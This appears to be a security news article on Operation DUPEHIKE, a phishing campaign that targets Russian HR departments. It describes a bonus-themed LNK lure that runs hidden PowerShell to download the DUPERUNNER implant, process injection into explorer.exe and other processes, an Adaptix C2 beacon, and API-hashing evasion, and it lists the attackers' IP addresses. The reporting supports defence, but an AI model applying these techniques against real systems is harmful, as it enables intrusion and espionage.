Operation DUPEHIKE Hits Russian HR: Bonus Lure Delivers DUPERUNNER and Adaptix C2 via Process Injection
Ddos 
A new, highly targeted espionage campaign dubbed Operation DUPEHIKE has been uncovered targeting corporate entities within the Russian Federation. Security researchers from the SEQRITE APT-Team have identified a sophisticated attack chain specifically aimed at Human Resources and payroll departments. The attackers are leveraging the promise of year-end financial rewards to breach corporate networks.
The attack begins with a classic spear-phishing email carrying a malicious ZIP archive. The file, named Премия 2025.zip (Bonus 2025.zip), is designed to be irresistible to employees expecting year-end compensation.
Inside the archive is not a legitimate document, but a malicious shortcut (LNK) file named Документ_1_0_размере_годовой_премии.pdf.lnk (Document_1_On_the_size_of_the_annual_bonus.pdf.lnk).
To further the deception, the attackers deploy a decoy document that perfectly mimics internal corporate policy. “The decoy document outline the internal corporate rules for calculating an employee’s annual bonus, describing it as a performance-based incentive tied to KPIs, job responsibilities, and contribution to organizational goals.”
When a victim clicks the malicious shortcut, it triggers a stealthy infection sequence. “The only sole purpose of the LNK is just to download from a remote server and execute the malicious implant DUPERUNNER using a Windows Utility known as powershell.exe.”
The LNK script executes PowerShell with flags like -NoNl, -nop, and -w hidden to run the attack in the background. This script downloads a file named s.exe—the DUPERUNNER implant—from the attacker’s server at 46[.]149[.]71[.]230.
The DUPERUNNER Capabilities:
- Stager Download: It downloads a secondary payload disguised as a font file (fontawesome.woff).
- Process Injection: It hunts for specific processes to inject malicious code into, specifically explorer.exe, notepad.exe, and msedge.exe.
- Persistence: It uses “classic Remote-Thread Injection where it allocates memory using VirtualAllocEx” to execute the final payload.
The ultimate goal of DUPERUNNER is to deploy the Adaptix C2 Beacon, an open-source command-and-control framework.
Once injected into a legitimate process, the beacon attempts to connect back to the threat actor’s infrastructure. “The malware walks the loaded module list and applies its custom, case-insensitive djb2-style hashing routine… to each module name until it finds a match for the target hash.” This technique allows it to dynamically resolve Windows APIs without triggering static analysis tools.
The campaign relies on distinct infrastructure for hosting payloads and command-and-control communication.
- Download Server: 46.149.71.230 (hosting the DUPERUNNER implant).
- C2 Server: 195.2.70.190 (hosting the Adaptix connection).
Researchers noted that the attackers may have made a configuration error or changed tactics during the campaign. “We believe, that the TA have had changed the configurations to port 443, to later use it as the server to host AdaptixC2”.
Donate